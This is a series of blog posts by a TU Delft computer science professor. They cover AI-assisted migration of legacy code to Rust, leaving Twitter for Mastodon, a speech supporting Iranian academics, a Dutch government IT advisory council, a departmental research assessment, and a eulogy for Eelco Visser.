Migrating Legacy Like a North Star Engineer

Posted in Society by Arie van Deursen

Microsoft wishes to get rid of a billion lines of C/C++ code. They target a rewrite to Rust by 2030, according to a recently posted job ad. Betting on AI, their “North Star” is:

1 engineer, 1 month, 1 million lines of code.

I admire the bold ambition, turning legacy modernization into the pinnacle of engineering excellence.

It also dangerously naive to suggest that thanks to AI a few engineers can modernize a multi-million line code base in a matter of months. I know too many board members (in government, finance, and other sectors) who would love to believe this suggestion. Legacy is their main headache. What can be more tempting than just waiting a little until the North Star Engineer emerges? And, lo and behold, there will even be vendors promising they can deliver exactly such engineers, together with tools powered by AI magic.

For board members contemplating to await this north star revolution, here is some advice on things to do without delay:

Disentangle the legacy landscape. Break dependencies. Ensure the legacy system can be modernized incrementally, component by component.
Invest in domain knowledge and deep understanding of the desired behavior. Ensure any discrepancies between old and new functionality can be interpreted correctly.
Invest in an idiomatic, uniform code base. The less variability, the easier any (automated) translation will be.
Invest in testing. Boost the automated test suites so that they exercise all key business logic. As the legacy system delivers mostly correct functionality, use it to (automatically) derive test suites achieving high coverage (which can subsequently be used to test migrated components).
Bring the legacy system in a state in which it is possible to deploy old and new versions of a component in parallel, and results can be compared.

None of these steps do any actual translation. They are, however, the starting point from which translation can be attempted. They bring the legacy system in a more manageable state, in which the risks of the migration can be mitigated by an incremental approach focused on gradual replacement and continuous feedback on correctness.

For some of these steps, program analysis tools and modern AI may help. But there are no free lunches. Each of the steps requires a substantial investment of effort and resources.

It is safe to assume that Microsoft is well aware of the need for these steps. What’s more, their systems are likely in relatively good starting position, with high levels of automated testing in place already. But even then, for automated translation to work substantial additional investments will be necessary.

This brings us back to the board members of ‘normal’ legacy-owning organizations.
Perhaps Microsoft can pull off some North Star Engineering magic. But for the legacy code that runs our taxes, payments and social security, it won’t make a difference. The legacy systems that run our society need continuous attention and investment, starting now, to ensure they stay ready for the decades ahead.

The Original Post

Galen Hunt, December 20, 2025.

I have an open position in my team for a IC5 Principal Software Engineer. The position is in-person in Redmond.

My goal is to eliminate every line of C and C++ from Microsoft by 2030. Our strategy is to combine AI and Algorithms to rewrite Microsoft’s largest codebases. Our North Star is “1 engineer, 1 month, 1 million lines of code”. To accomplish this previously unimaginable task, we’ve built a powerful code processing infrastructure. Our algorithmic infrastructure creates a scalable graph over source code at scale. Our AI processing infrastructure then enables us to apply AI agents, guided by algorithms, to make code modifications at scale. The core of this infrastructure is already operating at scale on problems such as code understanding.

The purpose of this Principal Software Engineer role is to help us evolve and augment our infrastructure to enable translating Microsoft’s largest C and C++ systems to Rust. A critical requirement for this role is experience building production quality systems-level code in Rust—preferably at least 3 years of experience writing systems-level code in Rust. Compiler, database, or OS implementation experience is highly desired. While compiler implementation experience is not required to apply, the willingness to acquire that experience in our team is required.

Our team is driven by a growth mindset. We are diverse team with a wide range of skills and perspectives. We take on bold risks. We work and play well with others. We love to bring value to internal and external customers. We have learned that our diversity and growth mindset is critical to success in the rapidly changing word of AI-based tools.

Our team is part of the Future of Scalable Software Engineering group in the EngHorizons organization in Microsoft CoreAI. Our mission is to build capabilities to allow Microsoft and our customers to eliminate technical debt at scale. We pioneer new tools and techniques with internal customers and partners, and then work with other product groups to deploy those capabilities at scale across Microsoft and across the industry.

Four days after posting, Galen Hunt placed an update:

Update:
It appears my post generated far more attention than I intended… with a lot of speculative reading between the lines.

Just to clarify… Windows is NOT being rewritten in Rust with AI.

My team’s project is a research project. We are building tech to make migration from language to language possible. The intent of my post was to find like-minded engineers to join us on the next stage of this multi-year endeavor—not to set a new strategy for Windows 11+ or to imply that Rust is an endpoint.

20Aug2023

Exit Twitter. Enter Mastodon?

Posted in Research by Arie van Deursen

I used to love Twitter. It was in 2009 that I joined it as @avandeursen. I mostly used it for work, to share and discuss research and education in software engineering. Looking back, this is what I liked best about Twitter:

It allowed me to connect to people who shared similar interests, even if I had never met them before;
It gave me a platform to share my views on current developments in my research area with thousands of people
It helped me stay current

Unfortunately, I find it harder and harder to stay excited about Twitter:

Human dignity is increasingly under attack at Twitter, making it a platform of harassment and mis-information. Mechanisms to handle this, such as moderation or ability to block, have been weakened instead of strengthened.
The owner of Twitter exhibits erratic and irrational behavior, thereby normalizing it.
Twitter randomly blocks or delays sources of useful information (e.g., Mastodon, New York Times), thereby making Twitter itself less useful.
Access to tweets has been limited: Now, they are only visible when logged in into Twitter, and older tweets (before 2014) are lost. To me tweeting is a form of (micro-)publishing, so hiding tweets defeats the purpose.

Thus, it is unavoidable that I take a step back in my Twitter presence. Platform X doesn’t deserve my carefully worded tweets.

As an alternative, I have been exploring Mastodon during the last 12 months. It’s not perfect, but there are a few things to like about it.

For one, it is entirely open, being based on the open ActivityPub protocol, and running on open source software. Naturally, my posts are open too, openly visible to anyone, even those without a Mastodon account.

Furthermore, it is federated, meaning it is a collection of micro-blogging servers that exchange messages with each other. This has interesting consequences:

There is no single owner of Mastodon (or the broader Fediverse of all ActivityPub-compliant servers). Billionaires can’t buy it.
As a user, you can select a server to join, for example a server on your favorite hobby. While this sounds easy, in practice finding a meaningful server to join isn’t always easy (and a potential road block to joining – see also below).
The server owners are responsible for formulating and enforcing an anti-harrassment policy, which is another factor in selecting a suitable server. Server admins can also block entire other servers if they consider the posts on such a server incompatible with their own code of conduct.

My own journey started a year ago on mastodon.social. I picked this server as it was the first and largest Mastodon server (300,000 users at the time of writing). I soon found a few friends who were active on the smaller fediscience.org with around 2,000 users to date. I therefore moved to this server, and have been there for the last 10 months.

In that period I shared around 250 posts, and built up a network of 300-400 people. While these numbers are small compared to Twitter (where I had over 4,000 followers), I find the engagement more meaningful and more pleasant. Mastodon very much reminds me of Twitter in its early days, when everyone did their best to get the most out of this exciting new technology.

Recently I have moved my Mastodon account to the mastodon.acm.org instance. The nice thing about Mastodon is that such moves are transparent to your followers: They automatically follow your new account instead of your old one if you decide to move. The new instance I picked wasn’t around yet when I originally joined Mastodon. It is hosted by the Association for Computing Machinery (ACM), and has around 250 users at the moment. The server is intended to provide a trustworthy space for computing professionals from around the world to connect and engage with each other in a meaningful way – which sounds spot on for me.

As a computing professional, I am a (paying) member of the ACM. I am very happy to see that ACM offers this service, including moderating content to enforce the server rules to be “professional, respectful, inclusive, accessible, honest, and friendly”. Anyone interested in computing can join: I sure hope to see you there!

30Nov2022

Mahsa Jina Amini and Anne Frank: Woman, Life, Freedom

Posted in Society by Arie van Deursen

Speech delivered on November 30, 2022, at TU Delft, as part of the Campus Rally for Iran, in which scholars from 227 universities across the world demonstrated for freedom, justice, and democracy in Iran.

Dear Friends, Salām!

Thank you for the invitation to speak here, which is an honor. My name is Arie, Arie van Deursen. I am a professor in computer science, and I am head of one of the Computer Science Departments here at TU Delft.

Computer science, like many other academic disciplines, is highly international. For example, when I saw the list of 135 universities participating in today’s rally, I recognized many places. I visited or collaborated with scholars from UBC, UVic, Waterloo, Amherst, UC Davis, Stuttgart, Bremen, Milan, Utrecht, and many more.

The reason is that academia is united as one. As academics, we believe in the free, rational exchange of ideas, to make this world a better place. Such discussion does not take place in isolation, but happens together, among academics from all over the world. Scholars depend on each other. We need each other. This also means that

If academia in one country is suffering, all of academia is suffering;
If students and professors are assaulted or arrested at one university, all universities feel the pain;
If, as in Iran right now, academic women, life, and freedom are under attack, all of academia is under attack.

This is why we stand here today, as scholars from all over the world, in solidarity with the students and scholars in Iran, in their peaceful fight for the freedom of the people of Iran.

I also stand here as a head of department. Like the rest of academia, the employees of my department, and the students we educate, come from all over the world. These include dozens of incredibly talented and wonderful people from Iran, many of whom are here today.

I cannot begin to imagine how difficult this period must be for you. You must be deeply concerned about the lives of your loved ones in Iran and the fate of your country. We, your colleagues, your peers, your professors: We think of you and we support you, and we strongly condemn the violence against you. If there is anything we can do to help you, please let us know.

I personally began to understand the situation in Iran a little better when I started supervising a PhD student from Iran, back in 2005. (Since then I have worked with many, and they have all been marvelous). This first student (Ali Mesbah, now a professor at UBC), defended his thesis in June 2009. As you know, this was an eventful period in Iran, and he, his paranimphs, and many people in the audience wore green wristbands in support of the protests in Iran at that time.

A few years later I read Marjane Satrapi’s beautiful graphic novel Persepolis. I think the book is forbidden in Iran, but my then teenage children had to read it at high school in The Netherlands, which prompted me to read it as well. I was mind blown. Persepolis tells Satrapi’s story of growing up in the new Islamic Republic: The oppression, the violence, and the balancing act separating your secret private life from what is allowed in public. It is also a story about moving to Europe as an art student, the loneliness this brings, and about how much you can miss your home country. And it is, ultimately, a story about love and family.

In a Vogue interview in 2016 with Emma Watson (of Hermione Granger fame), Marjane Satrapi gave a clear diagnosis of the root cause of Iran’s current status: “The enemy of democracy isn’t one person. The enemy of democracy is patriarchal culture.”

For resisting that culture, for fighting the patriarchy, Mahsa Jina Amini paid the ultimate price.

Since then, women and men across Iran have followed her lead, demanding freedom. Hundreds of peaceful protesters have been killed, thousands arrested, and tens of thousands assaulted. Despite that, the struggle for freedom continues. An iconic picture to me is that of two young women, no hijab, who were simply offering free hugs in a street in the city of Kermanshah. This is a time when the sad people of Iran just need a hug, they observed.

They were risking their lives. Their bravery is an inspiration to all of us.

Therefore, we stand here, and in more than one hundred universities around the world, in strong solidarity with you, to support you, in your demand for justice and freedom.

Let me conclude with a quote from another strong young woman, Anne Frank. She wrote it in her diary on April 12, 1944, when she was 14 years old. She had spent two years in an attic in Amsterdam, hiding for the German Nazi occupiers of The Netherlands. The day before, their hideout had been discovered by a burglar. They weren’t arrested yet, but the danger was imminent.

This is what she wrote. I’ll read it first in Dutch, and then in English.

Ik weet wat ik wil,
ik heb een doel; een mening,
ik heb een geloof en een liefde.
Laat me mezelf zijn, dan ben ik tevreden.
Ik weet dat ik een vrouw ben,
een vrouw met innerlijke sterkte en veel moed.

I know what I want,
I have a goal, an opinion,
I have a religion and love.
Let me be myself and then I am satisfied.
I know that I am a woman,
a woman with inward strength and plenty of courage.

Woman — life — freedom
Jin — Jiyan — Azadî
Jin — Jiyan — Azadî

Thank you very much!

Arie van Deursen. Delft, November 30, 2022

15Aug2022

Member Advisory Council IT Assessment

Posted in Society by Arie van Deursen

July 15, 2022, I have been appointed by the cabinet of the Dutch government as a member of the Advisory Council IT Assessment (AcICT), starting September 1st, 2022. I am happy, and honored, with this appointment!

The task of the council is as follows (my own translation):

The Advisory Council IT Assessment judges risks and the chance of success of ICT (Information and Communication Technology) projects within the Dutch national government, and offers advice for improvement. It also assesses the effectiveness and efficiency of the maintenance and management of information systems. The council consists of experts, from academia and industry, who have administrative, supervisory and management experience with regard to the realization, deployment and control of ICT processes.

Ministeries submit any project with an ICT-component of over 5 million Euros to the council. Based on a risk assessment, the council subsequently decides whether it conducts an investigation.

Since 2015, almost 100 assessments have been conducted, on various domains. Recent examples include high school exams, governmental treasury banking, vehicle taxes, and the development process of the Dutch Covid-19 tracking app.

The resulting assessment reports are 7-8 pages long, centered around a number (typically three) of core risks, followed by specific recommendations (also often three) on how to address these risks. Example risks from recent reports include:

“Key project results are not yet complete in the final stages of the project” (treasury)
“An unnecessarily fine-grained solution takes too much time” (exams)
“The program needs to realize too many changes simultaneously” (vehicle taxes)

The corresponding recommendations:

“Work towards a fallback scenario so that the old system can remain in operation until the new system is demonstrably stable” (treasury)
“Establish how to simplify the solution” (exams)
“Reduce the scope” (vehicle taxes)

The assessments are prepared by a team of presently around 20 ICT researchers and research managers. When needed, external researchers with specific expertise are consulted. Assessments follow an assessment framework, which distinguishes nine risk areas (such as scope, architecture, implementation, and acceptance).

The assessments serve to support political decision making, and are focused on the Dutch parliament and ministers. For each assessment, the minister in question offers a formal reaction, also available from the council’s web site. This serves to help parliament to fullfil their responsibility of checking the executive ministers.

The council consists of five members, each involved part time (for one day per week), for a period of four years, each bringing their own dedicated expertise. For me personally, I see a strong connection with my research and education at the TU Delft, in such areas as software architecture, software testing, and developer productivity.

As a computer scientist, I consider responsible, transparent, and cost-effective digitalization of great importance for the (Dutch) democracy and society. The advisory council fulfills a unique and important role, which is closely connected to my interests in software engineering. I look forward, together with my new colleagues from the AcICT, to contributing to the improvement of the digitalizations of the Dutch government.

I am presently not aware of comparable councils in other countries, in Europe or elsewhere. If you know of similar institutions in your own country, please let me know!

15Aug2022

Lid Adviescollege ICT-toetsing

Posted in Society by Arie van Deursen

Op 15 juli 2022 ben ik door de ministerraad benoemd als lid van het Adviescollege ICT-toetsing (AcICT), op voorstel van staatssecretaris Van Huffelen van Koninkrijksrelaties en Digitalisering, per 1 september 2022. Ik ben blij en vereerd met deze benoeming!

De opdracht van dit college is:

Het Adviescollege ICT-toetsing oordeelt over de risico’s en de slaagkans van ICT (Informatie- en Communicatie Technologie) projecten binnen de Rijksoverheid en geeft adviezen ter verbetering. Ook toetst het de doeltreffendheid en doelmatigheid van onderhoud en beheer van informatiesystemen. Het adviescollege bestaat uit deskundigen – uit de wetenschappelijke wereld en het bedrijfsleven – die beschikken over bestuurlijke, toezichthoudende en managementervaring met betrekking tot realisatie, inzet en beheersing van ICT-trajecten.

Ministeries melden elk project met een ICT-component van meer dan 5 miljoen Euro bij het Adviescollege aan. Op basis van een risicoanalyse beslist het AcICT vervolgens of het een onderzoek uitvoert.

Sinds 2015 (toen nog als Bureau ICT-toetsing — BIT) zijn bijna honderd onderzoeken uitgevoerd, recent bijvoorbeeld over het moderniseren van examens, het digitaliseren van schatkistbankieren, het rationaliseren van de motorrijtuigenbelasting, en het ontwikkelproces van de Coronamelder app.

De meeste adviezen zijn 7-8 pagina’s in omvang, en zijn opgebouwd rond een kern van (vaak drie) belangrijke risico’s, gevolgd door enkele (ook vaak drie) concrete adviezen hoe de koers bij te stellen in het licht van deze risico’s. Genoemde risico’s zijn bijvoorbeeld:

"Cruciale projectresultaten nog niet gereed zijn in het eindstadium van het project" (Schatkistbankieren)
"Onnodig fijnmazige oplossing kost veel tijd" (Examens)
"Het programma moet te veel veranderingen tegelijk realiseren" (Motorrijtuigenbelasting)

Met bijbehorend advies:

"Werk een terugvalscenario uit zodat het oude systeem blijft functioneren totdat het nieuwe systeem aantoonbaar stabiel is." (Schatkistbankieren)
"Identificeer hoe de oplossing eenvoudiger kan" (Examens)
"Beperk de scope" (Motorrijtuigenbelasting)

De adviezen worden voorbereid door een team van (op dit moment) circa 20 ICT-onderzoekers en -onderzoeksmanagers. Waar nodig worden ook externe onderzoekers met specifieke expertise ingezet. Leidraad voor elk onderzoek is het toetskader, waarin negen risicogebieden (zoals bijv. scope, architectuur, realisatie, en acceptatie) worden onderscheiden.

De adviezen dienen ter ondersteuning van de politieke besluitvorming, en zijn dus gericht op de Eerste en Tweede Kamer en de ministers en staatssecretarissen. De minister reageert op het onderzoek van het AcICT middels een brief die ook openbaar is (en ook te vinden op de AcICT website), waarna het parlement de adviezen en de bestuurlijke reactie kan controleren.

Het Adviescollege zelf telt vijf leden, elk met hun eigen expertise, die dit werk in deeltijd doen (één dag per week), voor een periode van vier jaar. Voor mij zie ik een mooie aansluiting bij mijn onderzoek en onderwijs aan de TU Delft, bijvoorbeeld op het gebied van software-architectuur, software-testen, en efficiëntie van het software-ontwikkelproces.

Verantwoorde, transparante, en kosten-effectieve digitalisering is van groot belang voor de Nederlandse democratie en samenleving. In het realiseren hiervan speelt het Adviescollege een belangrijke rol, en ik wil me dus graag inzetten voor het AcICT.

Ik zie ook een mooie connectie tussen de taken van het Adviescollege en mijn eigen kennis en ervaring op het gebied van software engineering. Ik kijk er naar uit om, samen met de nieuwe collega’s van het AcICT, een bijdrage te leveren aan de succesvolle digitalisering van de Nederlandse overheid.

4Jul2022

TU Delft Computer Science Research Assessment 2015-2020

Posted in Research by Arie van Deursen

Last year, the TU Delft computer science research programs were evaluated, comprising a reflection on the preceding six years (2015-2020), and an outlook the next six years.

The assessment follows the Strategy Evaluation Protocol (SEP), used by all Dutch universities, which focuses on research quality, societal impact, and viability. The assessment is conducted by an international external committee. It is based on a self-assessment written by us, as well as a two-day site visit by the committee.

Arie van Deursen and Alan Hanjalic in the Computer Science building

At TU Delft, computer science is organized into two departments: Intelligent Systems, chaired by Alan Hanjalic and Software Technology, chaired by me.

In 2021, Alan and I together worked hard to compile our self-assessment report. It is based on extensive discussions with and contributions by many people, both inside and outside the two departments. It contains our thoughts on what we want computer science in Delft to achieve (our mission), what we did to achieve this (our strategy), an assessment of the success of our approach (our SWOT), and a plan of action for the next years ahead (our future strategy).

We proudly make the full self-assessment report available via this link — the only modification being that for reasons of privacy we omitted some of the appendices that could be traced back too easily to individual faculty members.

As part of the protocol, the committee’s findings, as well as the reaction of the executive board to these findings, have been made available as well, at the central TU Delft site. The committee is “positive about the very high and often excellent research quality, the high quality of the staff as well as the energy, drive and potential of the primarily junior research staff of both departments,” and “recognizes the relevance and societal impact of the researchcarried out the INSY and ST departments.”

We are grateful to the external committee, and in particular for the 17 recommendations that will help us further strengthen TU Delft computer science. We have integrated these recommendations in the action plan already laid out in our self-assessment, and look forward to work with everyone in our departments and our faculty to execute this action plan in the next few years.

Below, we provide the executive summary of our self-assessment, and we invite you to have a look at our full report.

Self-Assessment Summary

The phenomena of datafication and AI-zation reflect the increasing tendency to quantify everything through data and to automate the decision-making processes that are also largely based on data. Since these phenomena have entered all segments of our lives and since research in computer science (CS) is at the heart of the technological developments underlying these phenomena, CS as a research field has gained strategic importance. TU Delft Computer Science operates at the forefront of these developments with the aim to help society at large, by enabling it to maximally benefit from these phenomena, while protecting it from potential risks. To that end, inspired and driven by the TU Delft core values of Diversity, Inclusion, Respect, Engagement, Courage and Trust (DIRECT), our mission includes (1) conducting world class research in selected computer science core areas; (2) maximizing opportunities for societal impact of our research; (3) providing rigorous, research-inspired engineering education in computer science; and (4) contributing to an international academic culture that is open, diverse and inclusive, and that offers openly available knowledge.

We are organized in two departments, Intelligent Systems and Software Technology, consisting of 5 and 6 sections respectively. Sections are small-scale organizational units, typically headed by a full or associate professor and marking a particular CS disciplinary scope. While the departments are separate units, they work closely together in research and education, and collaborate for societal impact. The convergence between the departments in terms of alignment and joint pursuit of strategic and operational goals has even become so strong over recent years that we can speak of an increasingly recognizable CS entity in Delft organizing its research into five main themes transcending the departmental and section boundaries: (1) decision support; (2) data management and analytics; (3) software systems engineering; (4) networked and distributed systems; and (5) security and privacy. The themes offer critical mass in order to achieve substantial impact, and each theme involves many researchers with various CS backgrounds and expertise.

Award-winning research in these themes achieved during 2015-2020 include a novel cross-modal (e.g., combining text and images) retrieval method based on adverserial learning; genetic algorithms for the automatic reproduction of software crashes to facilitate automated debugging; and Trustchain, a permission-less tamper-proof data structure for storing transaction records of agents with applications in digital identity. International recognition of our expertise is reflected by numerous leadership roles, e.g., as general or program chairs in numerous flagship conferences, such as AAAI, EuroGraphics, ACM/IEEE ICSE, ACM OOPSLA, ACM RecSys and ACM Multimedia. In the same time period, several staff members also received the highest (inter)national recognition in their fields, such as IEEE Fellow, membership of the Young Academy of the Royal Dutch Academy of Sciences, or the Netherlands Prize for ICT Research. Our scientific reputation also brought us into the consortia of two prestigious NWO Gravitation Projects (“NWO Zwaartekracht“) of the Dutch Research Council, Hybrid Intelligence and BRAINSCAPES – the consortia that “belong to the world top in their field of research or have the potential to do so”

To maximize societal impact, we embrace eight key sectors: transport and logistics, energy, health and well-being, safety and security, finance, online education, creative industry, and smart cities. To enable and support us in making substantial interdisciplinary impact in these sectors, we have built up expertise, a network of collaborators and societal partners, and established the necessary organizational structures. Prominent examples of our impact in these sectors include the NGS sequencing analysis pipeline we designed and implemented as part of the NIPT test, which is used routinely by hospitals in several countries; Cytosplore, a software system for interactive visual single-cell profiling of the immune system; and SocialGlass, a tool suite for integration, enrichment, and sense-making of urban data. Our close ties with society are also reflected in our strategic collaborations with socio-economical partners, such as ING, DSM, Booking.com, Adyen, Ripple, Erasmus Medical Center and Leiden University Medical Center, leading amongst other things to strategic investments in the form of three large industry-funded labs (with ING, DSM and Booking.com) setup in the assessed time period for a duration of five years. Furthermore, we have invested extensive effort in public outreach, explaining and discussing science with a broad audience, and in particular in the context of complex societal debates in the domain of AI and blockchain. Finally, we play a leading role in regional, national and European initiatives, most notably in the Dutch AI Coalition (NLAIC).

In addition to scientific excellence and strong impact in the selected societal sectors, we are committed to (a) meeting the increasing societal need for highly skilled CS experts, (b) development of human capital in our organization, leading to a new generation of international academic leaders, and (c) advancing the organization and academic culture, with the key pillars of open science, diversity and inclusion.

Regarding (a), we embraced an over 100% increase of our student population, but also aim at securing the highest possible level of their knowledge, skills and academic forming despite scaling up. Therefore, we value a close connection between research and education, and let both MSc and BSc students participate actively in our research. We also formulated an ambitious strategy, the realization of which would enable us to manage this education scale-up efficiently and effectively, leaving sufficient room to our staff for further developing scientific excellence and deploying it for societal impact. Part of this strategy is the growth of our academic staff towards 100 FTE by 2024 to meet the stabilization of the student numbers (due to numerus fixus). Between 2015 and 2020, we already achieved a net growth from 54 to 72 faculty members (+33%), with more to come in the upcoming years.

Next to BSc and MSc students, we are committed to delivering highly skilled CS experts at the PhD level. The number of PhD students grew from 105 to 165 (+57%) in the assessed time period, reflecting our ability to successfully acquire research funding in the present landscape. For our PhD students, the Graduate School defines a framework in which they can develop their skills next to conducting their thesis research. We strive towards completion of PhD theses within four years and organize our supervision, official moments of assessment, requirements on the volume and quality of the conducted research, as well as evidence of scientific impact through publications, accordingly.

Regarding (b), development of human capital: as computer science expertise is in high demand across the globe, finding strong new people as well as retaining our current staff proved highly challenging, especially given the high teaching load due to our record student intake. Therefore, acquiring, developing and retaining academic talent has been one of our most important goals. Dedicated actions, such as devising of a Development Track Plan, serve to empower each staff member to provide contribution to the organization in his/her own way, based on individual interests, talents and ambitions, and in view of our joint ambition as organization.

In view of (c), our organization, we embrace open science, with a substantial percentage (80% in 2020) of our articles available as open access, and by making numerous software tools and data sets openly available. We are a highly international organization with employees and students from all over the world. We strive to be an inclusive organization, where staff and students feel at home and valued, regardless of their background, age, gender, sexual orientation or functional disability. In terms of female faculty, we realized a net growth from 11 to 14 faculty members. As the number of men employed also increased, the percentage of female faculty stayed stable at around 20%. We consider this too low. We are committed to addressing this, for which we will take a long-term approach with, amongst other means, dedicated budget reserved for continued openings for female faculty in the upcoming years.

We are proud of our scientific successes and societal impact in the core computer science disciplines as well as in interdisciplinary research in our target societal sectors. This is especially so as those were achieved in a period that was transformational for TU Delft Computer Science, characterized by substantial growth and development across our organization and activities. We anticipate an even stronger societal demand for our research and expertise in the future. We will therefore continue to initiate, participate and take on a key role in effective and interdisciplinary partnerships at the university (TU Delft AI), regional (LDE), national (ICAI, IPN), and European (ELLIS, CLAIRE) levels. Furthermore, we will continue the growth path for our staff, in order to build up capacity enabling us to further develop our scientific excellence and offer our strongly increased student population the world-class research-intensive education they deserve. To achieve this, we center the next steps in our ongoing transformation around people, organization, and profiling and identify seven key actions for the upcoming years that aim at (1) improving our attractiveness as an employer; (2) improving diversity and inclusion; (3) improving the execution of the PhD program; (4) expanding our staff capacity; (5) aligning our office space with the optimal way of working; (6) articulating the scientific profile; and (7) boosting our scientific and societal impact.

15Apr2022

Eelco Visser (1966-2022)

Posted in Research by Arie van Deursen

Text of the eulogy for Eelco Visser (12 October 1966 – 5 April 2022) at his farewell ceremony held in Leusden, April 2022. Original text in Dutch.

I stand in front of you, in total disbelief, as head of the department for which Eelco Visser has worked the last 15 years.

I would like to offer you my perspective on Eelco’s significance, as a scientist, as a teacher, and as a person.

Eelco and I got to know each other in 1992, thirty years ago.

At the time, I was halfway my PhD in Amsterdam, working in the group of Paul Klint. Eelco was studying in Amsterdam, following Paul’s courses. These were so inspiring to Eelco that he decided to join Paul’s group, first to write his master’s thesis, and then to work on his PhD.

It didn’t take long before Eelco and I had a connection. We had extensive discussions about research. The details don’t matter, and they didn’t really lead to concrete results. But thirty years later I still remember the substantive drive, the deep desire to profoundly understand a problem, the feeling to work on something very important, and, of course, Eelco’s tenacity.

Eelco has been able to maintain that same drive for thirty years. Just like he knew how to inspire me, year after year he has inspired his students and his (international) peers — always driven by content, always persistent.

This contributed to Eelco’s research being of the highest international level. Let me illustrate this through an award he received in 2020, a so-called Most Influential Paper award. This is an award you get ten years after publication, after it has been established that your paper actually had made the biggest impact.

Eelco received this award for his article from 2010 on Spoofax, written with (then) PhD student Lennart Kats. Eelco was very proud of this award, and rightly so. In fact, he was so proud that he wrote a (long) blog post about it, entitled “A short history of the Spoofax language workbench.”

This “short history” starts in 1993 with Eelco’s PhD research in Amsterdam. Next, Eelco explains his journey, from Portland as a postdoc, via Utrecht as assistant professor, to Delft as associate and full professor. Each of these stops provides building blocks for the award-winning paper from 2010. And then, Eelco’s “short history” continues: He describes what his group in those ten years after the paper’s publication has done, and what good things he still has in store for the time to come.

To me, this “short history” is signature Eelco:

Visionary, working year after year on building blocks that all belong together
System-driven, with working software that he preferably contributes to himself
In a team, together with his PhD students, postdocs, engineers, students, and numerous international co-workers.

This short history also serves to illustrate the international side of Eelco’s work. He was very active, and loved, within international organizations like IFIP and ACM SIGPLAN. He succeeded in bringing the flagship SPLASH conference to Europe for the first time.

And, naturally, Eelco had a vision on how to improve things: All those conferences putting effort in ad hoc web sites: There had to be a better way. And so, in line with his systems philosophy, he designed the CONF system that has been up and running for ten years now. And he managed to convince hundreds of conferences to use his system, for a fee.

Likewise, Eelco had a vision on education, and he knew how to realize it. In his opinion, programming education just had to be better. Thus, he designed a system, WebLab, which has also been in operation for almost 10 years now. And here too he managed to convince countless teachers to use his system.

In addition, Eelco had a well-thought-out opinion about the courses that belong in a computer science program. So when we needed to revise our curriculum, Eelco was the perfect candidate to chair the associated committee. Eelco did this graciously, in a calm and persistent manner, reasoning from educational principles to settle disputes. The result is rock solid.

Eelco’s education is well characterized by Willem-Paul Brinkman in the online Farewell Community: Without maybe realizing it, many generations of Delft students will benefit from his teaching innovations.

Eelco was proud of his Programming Languages Group. He built it up from scratch into an international top group. He took good care of his people, fighting for the best equipment and offices. As a member of the departmental management team, he fought for computer science in full, at faculty and university level. Nationally he was active in, for example, the Dutch National Association for Software Engineering VERSEN.

And how was Eelco able to realize all this? What was his secret?

Perhaps Eelco actually liked (a little) resistance. He was not afraid to disagree: after all, he had thought deeply about his opinion. And he was fine with being challenged: it was a sign that he was well on his way to breaking the status quo.

Maybe not everyone always found this easy. But Eelco was also very friendly, and certainly willing to change his mind.

And, Eelco was also patient: Big changes take time. If he saw that he had insufficient supporters, he could wait. Or, under the radar, start small in order to set his own plans in motion.

How much we will miss Eelco in Delft! The visionary, the obstinate, the focus on the content, the love for computer science, the tenacity, and the attention for students and colleagues: exactly what we need so much in Delft.

Let me conclude with a few words related to Corona and the lock down. The past few years, Eelco and I were in touch weekly, mostly within the departmental management team, but also often one-on-one. All online, from home. We discussed departmental matters, small and large, as well as the impact of Corona. On one thing we agreed: Being at home more, seeing more of your children, doing more with the family: we both experienced this as a gift.

Due to the lock down, I don’t know when it was that I saw Eelco last in person. I think it was on October 14, at the PhD defense of Arjen Rouvoet. This was a beautiful day, and this is how I like to remember Eelco: Science at the highest level, international peers in substantive debate, a cum laude PhD defense, and Eelco happy, radiant in the midst of his PL group.

Dear family, friends, colleagues, everyone: We will miss Eelco very much. Each of us has his or her own, wonderful memories of Eelco. Today is a day to hold on to that, and to share those memories with each other.

I wish you all, and especially the family, all the best.

15Apr2022

Eelco Visser (1966-2022)

Posted in Research by Arie van Deursen

Toespraak gehouden tijdens de uitvaartplechtigheid van Eelco Visser (12 oktober 1966 – 5 april 2022) op 12 april 2022 in Leusden. English translation available.

Ik sta hier, in totale verbijstering, als hoofd van de afdeling waar Eelco Visser de afgelopen 15 jaar gewerkt heeft.

Ik wil U graag iets vertellen over de betekenis van Eelco, als wetenschapper, als docent, en als mens.

Eelco en ik leerden elkaar kennen in 1992, dertig jaar geleden.

Ik was toen halverwege mijn promotie in Amsterdam, en werkte in de groep van Paul Klint. Eelco studeerde toen in Amsterdam, en volgde colleges bij Paul. Die inspireerden hem zo dat hij zich aansloot bij Pauls groep om daar eerst af te studeren en later te promoveren.

Eelco en ik hadden al snel een klik. We hadden uitgebreide discussies over onderzoek. De details doen er niet toe, en tot een echt resultaat hebben ze niet geleid. Maar dertig jaar later herinner ik me nog steeds de inhoudelijke drive, de wens om een probleem écht te snappen, het gevoel samen met iets héél belangrijks bezig te zijn, en natuurlijk Eelco’s vasthoudendheid.

Diezelfde drive heeft Eelco dertig jaar vast weten te houden. Zoals hij mij wist te inspireren, heeft hij jaar in jaar uit zijn studenten, zijn promovendi, en zijn internationale collega’s aan zich weten te binden — altijd vanuit de inhoud, en altijd vasthoudend.

Mede hierdoor was Eelco’s onderzoek van het hoogste internationale niveau. Laat ik dit illustreren aan de hand van een prijs die hij in 2020 ontving: een zogenaamde “Most Influential Paper” Award. Zo’n prijs krijg je pas als je artikel 10 jaar na publicatie de meeste invloed gehad bleek te hebben.

Eelco kreeg die voor zijn artikel uit 2010 over Spoofax, met promovendus Lennart Kats. Eelco was hier, terecht, heel trots op. Zó trots, dat hij er een (lange) blog post over heeft geschreven, getiteld Een korte geschiedenis van de Spoofax taalwerkbank.

Deze “korte geschiedenis” begint in 1993 bij Eelco’s promotieonderzoek in Amsterdam. Vervolgens legt Eelco zijn reis uit, van Portland als postdoc, via Utrecht als universitair docent, naar Delft als hoofddocent en hoogleraar. Elk van deze tussenstops levert bouwstenen op voor het winnende paper uit 2010. En vervolgens gaat Eelco’s “korte geschiedenis” door: Hij beschrijft wat zijn groep in die tien jaar na het paper heeft gedaan, en wat voor moois hij nog in petto heeft voor de tijd die komen gaat.

Wat mij betreft is deze “korte geschiedenis” Eelco ten voeten uit:

visionair, jaar in jaar uit werkend aan bouwstenen die allemaal bij elkaar horen
systeem-gedreven, met werkende software systemen waar hij het liefst zelf aan meeprogrammeert
in team verband, samen met zijn promovendi, postdocs, engineers, studenten, en talloze internationale collega’s.

